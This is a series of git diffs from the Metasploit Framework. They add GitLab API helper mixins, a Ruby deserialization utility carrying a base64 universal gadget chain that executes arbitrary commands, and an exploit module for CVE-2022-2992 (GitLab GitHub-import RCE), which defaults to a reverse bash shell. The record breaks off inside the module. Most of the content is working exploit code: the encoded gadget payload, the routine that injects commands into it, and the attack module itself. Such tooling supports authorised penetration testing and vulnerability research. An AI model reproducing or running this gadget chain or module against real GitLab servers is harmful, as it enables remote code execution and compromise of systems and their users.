@@ -5,7 +5,7 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Rest::V4::Groups
   # Create a new group
   #
   # @return [String,nil] Group ID if successful create, nil otherwise
-  def create_group(group_name, api_token)
+  def gitlab_create_group(group_name, api_token)
     res = send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/api/v4/groups'),
@@ -32,7 +32,7 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Rest::V4::Groups
   # Delete a group
   #
   # @return [Bolean,GitLabClientError] True if successful deleted, Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientError otherwise
-  def delete_group(group_id, api_token)
+  def gitlab_delete_group(group_id, api_token)
     res = send_request_cgi({
       'method' => 'DELETE',
       'uri' => normalize_uri('/api/v4/groups', group_id),

--- a/lib/msf/core/exploit/remote/http/gitlab/rest/v4/groups.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/rest/v4/groups.rb
@@ -1,0 +1,51 @@
+# -*- coding: binary -*-
+
+# GitLab Groups mixin
+module Msf::Exploit::Remote::HTTP::Gitlab::Rest::V4::Groups
+  # Create a new group
+  #
+  # @return [String,nil] Group ID if successful create, nil otherwise
+  def create_group(group_name, api_token)
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/api/v4/groups'),
+      'ctype' => 'application/json',
+      'headers' => {
+        'PRIVATE-TOKEN' => api_token
+      },
+      'data' => {
+        name: group_name, path: group_name, visibility: 'public'
+      }.to_json
+    })
+
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError.new message: 'Request timed out' unless res
+
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::GroupError, "Unable to create group. Unexpected HTTP #{res.code} response." if res.code != 201
+
+    group = JSON.parse(res.body)
+
+    return group if group
+
+    nil
+  end
+
+  # Delete a group
+  #
+  # @return [Bolean,GitLabClientError] True if successful deleted, Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientError otherwise
+  def delete_group(group_id, api_token)
+    res = send_request_cgi({
+      'method' => 'DELETE',
+      'uri' => normalize_uri('/api/v4/groups', group_id),
+      'ctype' => 'application/json',
+      'headers' => {
+        'PRIVATE-TOKEN' => api_token
+      }
+    })
+
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError.new message: 'Request timed out' unless res
+
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::GroupError, "Unable to delete group. Unexpected HTTP #{res.code} response." if res.code != 202
+
+    true
+  end
+end

--- a/lib/msf/core/exploit/remote/http/gitlab/rest/v4/import.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/rest/v4/import.rb
@@ -1,0 +1,45 @@
+# -*- coding: binary -*-
+
+module Msf::Exploit::Remote::HTTP::Gitlab::Rest::V4::Import
+  # Import a repository from a remote URL
+  #
+  # @return [String,nil] Import ID if successfully enqueued, nil otherwise
+  def import_github_repo(group_name:, github_hostname:, api_token:)
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/api/v4/import/github'),
+      'ctype' => 'application/json',
+      'headers' => {
+        'PRIVATE-TOKEN' => api_token
+      },
+      'data' => {
+        'personal_access_token' => Rex::Text.rand_text_alphanumeric(8),
+        'repo_id' => rand(1000),
+        'target_namespace' => group_name,
+        'new_name' => "gh-import-#{rand(1000)}",
+        'github_hostname' => github_hostname
+      }.to_json
+    })
+
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError.new message: 'Request timed out' unless res
+
+    # 422 is returned if the import failed, but the response body contains the error message
+    if res.code == 422
+      raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ImportError, ((res.get_json_document || {})['errors'] || 'Import failed')
+    end
+
+    # 201 is returned if the import was successfully enqueued
+    unless res.code == 201
+      raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ImportError, ((res.get_json_document || {})['errors'] || 'Import failed')
+    end
+
+    # Example of a successful response body
+    # {"id":54,"name":"gh-import-761","full_path":"/fpXxUqzfQY/gh-import-761","full_name":"fpXxUqzfQY / gh-import-761"}
+
+    body = res.get_json_document
+
+    return body if body
+
+    nil
+  end
+end

--- a/lib/msf/core/exploit/remote/http/gitlab/rest/v4/import.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/rest/v4/import.rb
@@ -4,7 +4,7 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Rest::V4::Import
   # Import a repository from a remote URL
   #
   # @return [String,nil] Import ID if successfully enqueued, nil otherwise
-  def import_github_repo(group_name:, github_hostname:, api_token:)
+  def gitlab_import_github_repo(group_name:, github_hostname:, api_token:)
     res = send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/api/v4/import/github'),

--- a/lib/msf/core/exploit/remote/http/gitlab/rest/v4/version.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/rest/v4/version.rb
@@ -1,0 +1,23 @@
+# -*- coding: binary -*-
+
+module Msf::Exploit::Remote::HTTP::Gitlab::Rest::V4::Version
+  # Extracts the Gitlab version information from various sources
+  #
+  # @return [String,nil] Gitlab version if found, nil otherwise
+  def gitlab_version
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/api/v4/version'),
+      'keep_cookies' => true
+    })
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError.new message: 'Request timed out' unless res
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::VersionError unless res.code == 200
+
+    body = JSON.parse(res.body)
+    version = body['version'][Regexp.new(Msf::Exploit::Remote::HTTP::Gitlab::GITLAB_VERSION_PATTERN), 1]
+
+    return version if version
+
+    nil
+  end
+end

--- a/lib/msf/core/exploit/remote/http/gitlab/signin.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/signin.rb
@@ -14,6 +14,7 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Signin
       path: sign_in_path,
       regex: %r{action="/users/sign_in".*name="authenticity_token"\s+value="([^"]+)"}
     )
+    raise Msf::Exploit::Remote::HTTP::GitLab::Error::CsrfError unless csrf_token
     res = send_request_cgi({
       'method' => 'POST',
       'uri' => sign_in_path,
@@ -21,15 +22,7 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Signin
       'vars_post' => gitlab_helper_login_post_data(username, password, csrf_token)
     })
 
-    if res.nil? || res.body.nil?
-      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, 'Empty response. Please validate RHOST'
-    elsif res.body.include?('Invalid Login or password')
-      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, 'Username or password invalid'
-    elsif res.code != 302
-      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, "#{__method__} Unexpected HTTP #{res.code} response."
-    elsif res.headers.fetch('Location', '').include?(sign_in_path)
-      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, 'Login not successful. The account may need activated. Verify login works manually.'
-    end
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::AuthenticationError if res&.code != 302
 
     cookies = res.get_cookies
     # Check if a valid gitlab cookie is returned
@@ -40,7 +33,7 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Signin
 
   # performs a gitlab logout
   #
-  # @return [Bolean,GitLabClientException] True if sign out, Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException otherwise
+  # @return [Bolean,GitLabError] True if sign out, Msf::Exploit::Remote::HTTP::Gitlab::Error otherwise
   def gitlab_sign_out
     csrf_token = gitlab_helper_extract_csrf_token(
       path: '/',
@@ -56,7 +49,7 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Signin
       }
     })
 
-    raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, "#{__method__} Unexpected HTTP #{res.code} response." unless res&.code == 302 && res&.headers&.fetch('Location', '')&.include?('/users/sign_in')
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError, 'Failed to sign out'unless res&.code == 302 && res&.headers&.fetch('Location', '')&.include?('/users/sign_in')
 
     true
   end

--- a/lib/msf/core/exploit/remote/http/gitlab/signin.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/signin.rb
@@ -23,7 +23,9 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Signin
       'vars_post' => gitlab_helper_login_post_data(username, password, csrf_token)
     })
 
-    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::AuthenticationError if res&.code != 302
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError.new message: 'Request timed out' unless res
+
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::AuthenticationError if res.code != 302
 
     cookies = res.get_cookies
     # Check if a valid gitlab cookie is returned
@@ -50,7 +52,9 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Signin
       }
     })
 
-    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError, 'Failed to sign out' unless res&.code == 302 && res&.headers&.fetch('Location', '')&.include?('/users/sign_in')
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError.new message: 'Request timed out' unless res
+
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError, 'Failed to sign out' unless res.code == 302 && res.headers&.fetch('Location', '')&.include?('/users/sign_in')
 
     true
   end

--- a/lib/msf/core/exploit/remote/http/gitlab/signin.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/signin.rb
@@ -15,9 +15,10 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Signin
       regex: %r{action="/users/sign_in".*name="authenticity_token"\s+value="([^"]+)"}
     )
     raise Msf::Exploit::Remote::HTTP::GitLab::Error::CsrfError unless csrf_token
+
     res = send_request_cgi({
       'method' => 'POST',
-      'uri' => sign_in_path,
+      'uri' => normalize_uri(target_uri.path, sign_in_path),
       'keep_cookies' => true,
       'vars_post' => gitlab_helper_login_post_data(username, password, csrf_token)
     })
@@ -41,7 +42,7 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Signin
     )
     res = send_request_cgi({
       'method' => 'POST',
-      'uri' => '/users/sign_out',
+      'uri' => normalize_uri(target_uri.path, '/users/sign_out'),
       'keep_cookies' => true,
       'vars_post' => {
         '_method' => 'post',

--- a/lib/msf/core/exploit/remote/http/gitlab/signin.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/signin.rb
@@ -1,0 +1,63 @@
+# -*- coding: binary -*-
+
+# GitLab session mixin
+module Msf::Exploit::Remote::HTTP::Gitlab::Signin
+  # performs a gitlab login
+  #
+  # @param user [String] Username
+  # @param pass [String] Password
+  # @param timeout [Integer] The maximum number of seconds to wait before the request times out
+  # @return [String,nil] the session cookies as a single string on successful login, nil otherwise
+  def gitlab_sign_in(username, password)
+    sign_in_path = '/users/sign_in'
+    csrf_token = gitlab_helper_extract_csrf_token(
+      path: sign_in_path,
+      regex: %r{action="/users/sign_in".*name="authenticity_token"\s+value="([^"]+)"}
+    )
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => sign_in_path,
+      'keep_cookies' => true,
+      'vars_post' => gitlab_helper_login_post_data(username, password, csrf_token)
+    })
+
+    if res.nil? || res.body.nil?
+      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, 'Empty response. Please validate RHOST'
+    elsif res.body.include?('Invalid Login or password')
+      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, 'Username or password invalid'
+    elsif res.code != 302
+      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, "#{__method__} Unexpected HTTP #{res.code} response."
+    elsif res.headers.fetch('Location', '').include?(sign_in_path)
+      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, 'Login not successful. The account may need activated. Verify login works manually.'
+    end
+
+    cookies = res.get_cookies
+    # Check if a valid gitlab cookie is returned
+    return cookies if cookies =~ /(_gitlab_session=[A-Za-z0-9%-]+)/i
+
+    nil
+  end
+
+  # performs a gitlab logout
+  #
+  # @return [Bolean,GitLabClientException] True if sign out, Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException otherwise
+  def gitlab_sign_out
+    csrf_token = gitlab_helper_extract_csrf_token(
+      path: '/',
+      regex: /name="csrf-token" content="(.*)"/
+    )
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => '/users/sign_out',
+      'keep_cookies' => true,
+      'vars_post' => {
+        '_method' => 'post',
+        'authenticity_token' => csrf_token
+      }
+    })
+
+    raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, "#{__method__} Unexpected HTTP #{res.code} response." unless res&.code == 302 && res&.headers&.fetch('Location', '')&.include?('/users/sign_in')
+
+    true
+  end
+end

--- a/lib/msf/core/exploit/remote/http/gitlab/signin.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/signin.rb
@@ -49,7 +49,7 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Signin
       }
     })
 
-    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError, 'Failed to sign out'unless res&.code == 302 && res&.headers&.fetch('Location', '')&.include?('/users/sign_in')
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError, 'Failed to sign out' unless res&.code == 302 && res&.headers&.fetch('Location', '')&.include?('/users/sign_in')
 
     true
   end

--- a/lib/msf/core/exploit/remote/http/gitlab/version.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/version.rb
@@ -11,17 +11,14 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Version
   def gitlab_version
     res = send_request_cgi({
       'method' => 'GET',
-      'uri' => '/api/v4/version',
+      'uri' => normalize_uri(target_uri.path, '/api/v4/version'),
       'keep_cookies' => true
     })
 
     raise Msf::Exploit::Remote::HTTP::Gitlab::Error::VersionError unless res&.code == 200
 
-    version = Rex::Version.new(
-      JSON.parse(
-        res.body
-      )['version'][Regexp.new(GITLAB_VERSION_PATTERN), 1]
-    )
+    body = JSON.parse(res.body)
+    version = body['version'][Regexp.new(GITLAB_VERSION_PATTERN), 1]
 
     return version if version
 

--- a/lib/msf/core/exploit/remote/http/gitlab/version.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/version.rb
@@ -15,11 +15,7 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Version
       'keep_cookies' => true
     })
 
-    if res.nil? || res.body.nil?
-      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, 'Empty response. Please validate RHOST'
-    elsif res.code != 200
-      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, "#{__method__} Unexpected HTTP #{res.code} response."
-    end
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::VersionError unless res&.code == 200
 
     version = Rex::Version.new(
       JSON.parse(

--- a/lib/msf/core/exploit/remote/http/gitlab/version.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/version.rb
@@ -14,8 +14,8 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Version
       'uri' => normalize_uri(target_uri.path, '/api/v4/version'),
       'keep_cookies' => true
     })
-
-    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::VersionError unless res&.code == 200
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError.new message: 'Request timed out' unless res
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::VersionError unless res.code == 200
 
     body = JSON.parse(res.body)
     version = body['version'][Regexp.new(GITLAB_VERSION_PATTERN), 1]

--- a/lib/msf/core/exploit/remote/http/gitlab/version.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/version.rb
@@ -1,0 +1,34 @@
+# -*- coding: binary -*-
+
+# GitLab version mixin
+module Msf::Exploit::Remote::HTTP::Gitlab::Version
+  # Used to check if the version is correct: must contain at least one dot
+  GITLAB_VERSION_PATTERN = '(\d+\.\d+(?:\.\d+)*)'.freeze
+
+  # Extracts the Gitlab version information from various sources
+  #
+  # @return [String,nil] Gitlab version if found, nil otherwise
+  def gitlab_version
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => '/api/v4/version',
+      'keep_cookies' => true
+    })
+
+    if res.nil? || res.body.nil?
+      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, 'Empty response. Please validate RHOST'
+    elsif res.code != 200
+      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, "#{__method__} Unexpected HTTP #{res.code} response."
+    end
+
+    version = Rex::Version.new(
+      JSON.parse(
+        res.body
+      )['version'][Regexp.new(GITLAB_VERSION_PATTERN), 1]
+    )
+
+    return version if version
+
+    nil
+  end
+end

--- a/lib/msf/core/exploit/remote/http/gitlab/version.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/version.rb
@@ -5,23 +5,5 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Version
   # Used to check if the version is correct: must contain at least one dot
   GITLAB_VERSION_PATTERN = '(\d+\.\d+(?:\.\d+)*)'.freeze
 
-  # Extracts the Gitlab version information from various sources
-  #
-  # @return [String,nil] Gitlab version if found, nil otherwise
-  def gitlab_version
-    res = send_request_cgi({
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, '/api/v4/version'),
-      'keep_cookies' => true
-    })
-    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError.new message: 'Request timed out' unless res
-    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::VersionError unless res.code == 200
-
-    body = JSON.parse(res.body)
-    version = body['version'][Regexp.new(GITLAB_VERSION_PATTERN), 1]
-
-    return version if version
-
-    nil
-  end
+  include Msf::Exploit::Remote::HTTP::Gitlab::Rest::V4::Version
 end

--- a/lib/msf/core/exploit/ruby_deserialization.rb
+++ b/lib/msf/core/exploit/ruby_deserialization.rb
@@ -13,7 +13,7 @@ module Msf
     # @param [String] command The OS command to execute.
     #
     # @return [String] The opaque data blob.
-    def generate_ruby_deserialization_for_command(command, name = 'Universal')
+    def generate_ruby_deserialization_for_command(command, name)
       Msf::Util::RubyDeserialization.payload(name, command)
     end
 
@@ -27,7 +27,7 @@ module Msf
     #   operating system command.
     #
     # @return [String] The opaque data blob.
-    def generate_ruby_deserialization_for_payload(payload, name = 'Universal')
+    def generate_ruby_deserialization_for_payload(payload, name)
       command = nil
 
       if payload.platform.platforms == [Msf::Module::Platform::Windows]

--- a/lib/msf/core/exploit/ruby_deserialization.rb
+++ b/lib/msf/core/exploit/ruby_deserialization.rb
@@ -1,0 +1,54 @@
+# -*- coding: binary -*-
+
+# Ruby deserialization mixin
+module Msf
+  # Ruby deserialization exploit module
+  module Exploit::RubyDeserialization
+    include Msf::Exploit::Powershell
+
+    # Generate a binary blob that when deserialized by Ruby will execute the specified command using the platform-specific
+    # shell.
+    #
+    # @param [String] name The name of the payload to use.
+    # @param [String] command The OS command to execute.
+    #
+    # @return [String] The opaque data blob.
+    def generate_ruby_deserialization_for_command(command, name = 'Universal')
+      Msf::Util::RubyDeserialization.payload(name, command)
+    end
+
+    # Generate a binary blob that when deserialized by ruby will execute the specified payload. This routine converts the
+    # payload automatically based on the platform and architecture.
+    #
+    # @param [String] name The name of the payload to use.
+    # @param [Msf::EncodedPayload] payload The payload to execute.
+    #
+    # @raise [RuntimeError] This raises a RuntimeError of the specified payload can not be automatically converted to an
+    #   operating system command.
+    #
+    # @return [String] The opaque data blob.
+    def generate_ruby_deserialization_for_payload(payload, name = 'Universal')
+      command = nil
+
+      if payload.platform.platforms == [Msf::Module::Platform::Windows]
+        if [ Rex::Arch::ARCH_X86, Rex::Arch::ARCH_X64 ].include? payload.arch.first
+          command = cmd_psh_payload(payload.encoded, payload.arch.first, { remove_comspec: true })
+        elsif payload.arch.first == Rex::Arch::ARCH_CMD
+          command = payload.encoded
+        end
+      elsif payload.arch.first == Rex::Arch::ARCH_CMD
+        command = payload.encoded
+      end
+
+      if command.nil?
+        raise 'Could not generate the payload for the platform/architecture combination'
+      end
+
+      generate_ruby_deserialization_for_command(command, name)
+    end
+
+    def self.gadget_chains
+      Msf::Util::RubyDeserialization.payload_names
+    end
+  end
+end

--- a/lib/msf/util/ruby_deserialization.rb
+++ b/lib/msf/util/ruby_deserialization.rb
@@ -1,0 +1,43 @@
+# -*- coding: binary -*-
+
+# Ruby deserialization Utility
+module Msf
+  module Util
+    # Ruby deserialization class
+    class RubyDeserialization
+      # That could be in the future a list of payloads used to exploit the Ruby deserialization vulnerability.
+      # TODO: Add more payloads
+      # TDOO: Create a json file with the payloads?
+      PAYLOADS = {
+        'Universal' => {
+          'status' => 'dynamic',
+          'length_offset' => 309,
+          'buffer_offset' => 310,
+          # https://devcraft.io/2021/01/07/universal-deserialisation-gadget-for-ruby-2-x-3-x.html
+          'bytes' => 'BAhbCGMVR2VtOjpTcGVjRmV0Y2hlcmMTR2VtOjpJbnN0YWxsZXJVOhVHZW06OlJlcXVpcmVtZW50WwZvOhxHZW06OlBhY2thZ2U6OlRhclJlYWRlcgY6CEBpb286FE5ldDo6QnVmZmVyZWRJTwc7B286I0dlbTo6UGFja2FnZTo6VGFyUmVhZGVyOjpFbnRyeQc6CkByZWFkaQA6DEBoZWFkZXJJIhlTR1Y1WkdWeVFXNWtjbUZrWlNBZwY6BkVUOhJAZGVidWdfb3V0cHV0bzoWTmV0OjpXcml0ZUFkYXB0ZXIHOgxAc29ja2V0bzoUR2VtOjpSZXF1ZXN0U2V0BzoKQHNldHNvOw4HOw9tC0tlcm5lbDoPQG1ldGhvZF9pZDoLc3lzdGVtOg1AZ2l0X3NldEkiBQY7DFQ7EjoMcmVzb2x2ZQ=='
+        }
+      }.freeze
+      def self.payload(payload_name, command = nil)
+        payload = PAYLOADS[payload_name]
+
+        raise ArgumentError, "#{payload_name} payload not found in payloads" if payload.nil?
+
+        bytes = Rex::Text.decode_base64(payload['bytes'])
+
+        length = [command.length.ord + 5 ].pack('C*')
+
+        bytes[payload['buffer_offset'] - 1] += command
+        bytes[payload['length_offset']] = length
+
+        bytes.gsub!('SGV5ZGVyQW5kcmFkZSAg', Rex::Text.rand_text_alphanumeric(20))
+
+        bytes
+      end
+
+      def self.payload_names
+        PAYLOADS.keys
+      end
+
+    end
+  end
+end

--- a/lib/msf/util/ruby_deserialization.rb
+++ b/lib/msf/util/ruby_deserialization.rb
@@ -17,6 +17,7 @@ module Msf
           'bytes' => 'BAhbCGMVR2VtOjpTcGVjRmV0Y2hlcmMTR2VtOjpJbnN0YWxsZXJVOhVHZW06OlJlcXVpcmVtZW50WwZvOhxHZW06OlBhY2thZ2U6OlRhclJlYWRlcgY6CEBpb286FE5ldDo6QnVmZmVyZWRJTwc7B286I0dlbTo6UGFja2FnZTo6VGFyUmVhZGVyOjpFbnRyeQc6CkByZWFkaQA6DEBoZWFkZXJJIhlTR1Y1WkdWeVFXNWtjbUZrWlNBZwY6BkVUOhJAZGVidWdfb3V0cHV0bzoWTmV0OjpXcml0ZUFkYXB0ZXIHOgxAc29ja2V0bzoUR2VtOjpSZXF1ZXN0U2V0BzoKQHNldHNvOw4HOw9tC0tlcm5lbDoPQG1ldGhvZF9pZDoLc3lzdGVtOg1AZ2l0X3NldEkiBQY7DFQ7EjoMcmVzb2x2ZQ=='
         }
       }.freeze
+      
       def self.payload(payload_name, command = nil)
         payload = PAYLOADS[payload_name]
 

--- a/lib/msf/util/ruby_deserialization.rb
+++ b/lib/msf/util/ruby_deserialization.rb
@@ -17,7 +17,7 @@ module Msf
           'bytes' => 'BAhbCGMVR2VtOjpTcGVjRmV0Y2hlcmMTR2VtOjpJbnN0YWxsZXJVOhVHZW06OlJlcXVpcmVtZW50WwZvOhxHZW06OlBhY2thZ2U6OlRhclJlYWRlcgY6CEBpb286FE5ldDo6QnVmZmVyZWRJTwc7B286I0dlbTo6UGFja2FnZTo6VGFyUmVhZGVyOjpFbnRyeQc6CkByZWFkaQA6DEBoZWFkZXJJIhlTR1Y1WkdWeVFXNWtjbUZrWlNBZwY6BkVUOhJAZGVidWdfb3V0cHV0bzoWTmV0OjpXcml0ZUFkYXB0ZXIHOgxAc29ja2V0bzoUR2VtOjpSZXF1ZXN0U2V0BzoKQHNldHNvOw4HOw9tC0tlcm5lbDoPQG1ldGhvZF9pZDoLc3lzdGVtOg1AZ2l0X3NldEkiBQY7DFQ7EjoMcmVzb2x2ZQ=='
         }
       }.freeze
-      
+
       def self.payload(payload_name, command = nil)
         payload = PAYLOADS[payload_name]
 

--- a/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb
+++ b/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb
@@ -20,12 +20,12 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'Gitlab Github Repo Import Deserialization RCE',
+        'Name' => 'GitLab GitHub Repo Import Deserialization RCE',
         'Description' => %q{
-          An authenticated user can import a repository from Github into Gitlab.
+          An authenticated user can import a repository from GitHub into GitLab.
           If a user attempts to import a repo from an attacker-controlled server,
           the server will reply with a Redis serialization protocol object in the nested
-          `default_branch`. Gitlab will cache this object and
+          `default_branch`. GitLab will cache this object and
           then deserialize it when trying to load a user session, resulting in RCE.
         },
         'Author' => [
@@ -106,7 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     version = Rex::Version.new(gitlab_version)
 
-    return CheckCode::Safe("Detected Gitlab version #{version} which is not vulnerable") unless (
+    return CheckCode::Safe("Detected GitLab version #{version} which is not vulnerable") unless (
       version.between?(Rex::Version.new('11.10'), Rex::Version.new('15.1.6')) ||
       version.between?(Rex::Version.new('15.2'), Rex::Version.new('15.2.4')) ||
       version.between?(Rex::Version.new('15.3'), Rex::Version.new('15.3.2'))
@@ -118,7 +118,9 @@ class MetasploitModule < Msf::Exploit::Remote
       refs: references,
       info: [version]
     )
-    return CheckCode::Vulnerable("Detected Gitlab version #{version} which is vulnerable")
+    return CheckCode::Appears("Detected GitLab version #{version} which is vulnerable.")
+  rescue Msf::Exploit::Remote::HTTP::Gitlab::Error::AuthenticationError
+    return CheckCode::Detected('Could not detect the version because authentication failed.')
   rescue Msf::Exploit::Remote::HTTP::Gitlab::Error => e
     return CheckCode::Unknown("#{e.class} - #{e.message}")
   end
@@ -151,11 +153,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def execute_command(cmd, _opts = {})
     vprint_status("Executing command: #{cmd}")
-    # due the AutoCheck mixin and the keep_cookies option the cookie might be already seted
+    # due to the AutoCheck mixin and the keep_cookies option, the cookie might be already set
     self.cookie = gitlab_sign_in(datastore['USERNAME'], datastore['PASSWORD']) unless cookie
     vprint_status("Session ID: #{session_id}")
     vprint_status("Creating group #{group_name}")
-    # We need group id for the clenaup method
+    # We need group id for the cleanup method
     @group_id = gitlab_create_group(group_name, api_token)['id']
     fail_with(Failure::UnexpectedReply, 'Failed to create a new group') unless @group_id
     @redis_payload = redis_payload(cmd)
@@ -206,7 +208,7 @@ class MetasploitModule < Msf::Exploit::Remote
     @packfile = Msf::Exploit::Git::Packfile.new('2', git_objs)
   end
 
-  # Handle incoming requests from Gitlab server
+  # Handle incoming requests from GitLab server
   def on_request_uri(cli, req)
     super
     headers = { 'Content-Type' => 'application/json' }

--- a/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb
+++ b/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb
@@ -1,0 +1,204 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::RubyDeserialization
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::Remote::HTTP::Gitlab
+
+  attr_accessor :cookie
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Remote Command Execution via Github import',
+        'Description' => %q{
+          An authenticated user can import a repository from Github into Gitlab.
+          One can try to import from an attacker's controller server which
+          replies with a Redis' serialization protocol object in the nested
+          default_branch making the Gitlab to cache this object on redis and
+          the redis to deserialize it and trigger execute the payload.
+        },
+        'Author' => [
+          'vakzz', # discovery
+          'Heyder Andrade <https://infosec.exchange/@heyder>', # msf module
+          'RedWay Security <https://infosec.exchange/@redway>', # PoC
+        ],
+        'References' => [
+          ['URL', 'https://hackerone.com/reports/1679624'],
+          ['URL', 'https://github.com/redwaysecurity/CVEs/tree/main/CVE-2022-2992'], # PoC
+          ['CVE', '2022-2992']
+        ],
+        'DisclosureDate' => '2022-10-06',
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ]
+        ],
+        'DefaultOptions' => { 'WfsDelay' => 20 },
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [true, 'The username to authenticate as', nil]),
+        OptString.new('PASSWORD', [true, 'The password for the specified username', nil]),
+        OptString.new('NGROK_URL', [true, 'The Ngrok tunnel url', '/'])
+      ]
+    )
+  end
+
+  def group_name
+    @group_name ||= Rex::Text.rand_text_alpha(8..12)
+  end
+
+  def api_token
+    @api_token ||= gitlab_create_access_token
+  end
+
+  def session_id
+    @session_id ||= Rex::Text.rand_text_alpha_lower(4)
+  end
+
+  def redis_payload(cmd)
+    serialized_payload = generate_ruby_deserialization_for_command(cmd)
